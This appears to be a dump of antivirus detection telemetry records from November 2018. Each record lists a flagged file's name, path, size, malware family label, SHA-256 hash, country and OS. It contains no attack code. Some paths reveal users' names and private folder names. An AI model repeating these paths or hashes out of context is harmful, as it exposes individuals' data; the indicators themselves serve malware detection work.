  Row(detection=Row(filename='avscan-20181102-054037-cbe3db30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054037-CBE3DB30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053100-73d492a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053100-73D492A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052714-ed02ef6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052714-ED02EF6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060304-ee982cb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060304-EE982CB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d1afbe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D1AFBE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054544-82d815b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054544-82D815B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba094a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA094A2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054006-b97bdda4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054006-B97BDDA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052604-c32ba6b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052604-C32BA6B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061951-472499fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061951-472499FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062645-3dceec3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062645-3DCEEC3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052736-fa51edd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052736-FA51EDD5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062528-0fb22211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062528-0FB22211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050444-c8a07990', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050444-C8A07990', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051033-9877246e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051033-9877246E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061734-f53917a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061734-F53917A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062346-d2f5652f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062346-D2F5652F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050519-dd3762f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050519-DD3762F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052554-bd75aa2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052554-BD75AA2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051147-c48fb253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051147-C48FB253', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\Dany\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050552-f12a3000', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050552-F12A3000', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051418-1e623ae1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051418-1E623AE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054341-39893f5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054341-39893F5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051128-b934031f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051128-B934031F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053525-11ff4f75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053525-11FF4F75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054355-41c2f8df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054355-41C2F8DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051232-dfb47274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051232-DFB47274', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='815be852e3c74e568ce25f415cf9472f6506d96120fa4a10556505fe054b966d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7A00B10C55F7D7FDBAD4E1BB9DA67B5719BDE6FA5881D99EDCE14CDE01410757', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050824-4bb504db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050824-4BB504DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053351-d99e460d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053351-D99E460D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054410-4a92d987', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054410-4A92D987', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062240-abb218c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062240-ABB218C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051411-1ac075e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051411-1AC075E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062410-e131c228', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062410-E131C228', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bogor.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\training bogor\\bogor.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155539-be2e8ce0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155539-BE2E8CE0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='E:\\Programing\\Programming Software\\Toad for Oracle 9.7.0.51 Commercial\\keygen.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3032e0808e60987d34c3ad1b2e9c0bc0312be1b080c6b1868f63f7b1271b16b5', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T08:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155228-9e157100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155228-9E157100', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160321-0c136a3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160321-0C136A3F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shirl.exe', filepath='C:\\Program Files (x86)\\Shirl\\Shirl.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4414197\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  MAY. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='3089357a0215d9e4526c28dddc1c2f86ac6673e5791c3d60733b2ae1601c4747', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\273878B53A23DEDFBA9510BA5363C43B97211BEE5D8EBF79FF506FF0691E98A4', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:02:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7-zip.dll', filepath='D:\\the lasted software\\ansys step\\X64\\util\\7zip\\7-zip.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5396834fe20eb5d62c841f3f383ea7c0fbdeb93496119aca02b5650f8a9e9073', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:27:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agustus.exe', filepath='D:\\DATA_SHARE\\audit\\2016\\agustus\\agustus.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-27-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T00:47:25Z'), dt=datetime.date(2018, 11, 1)),
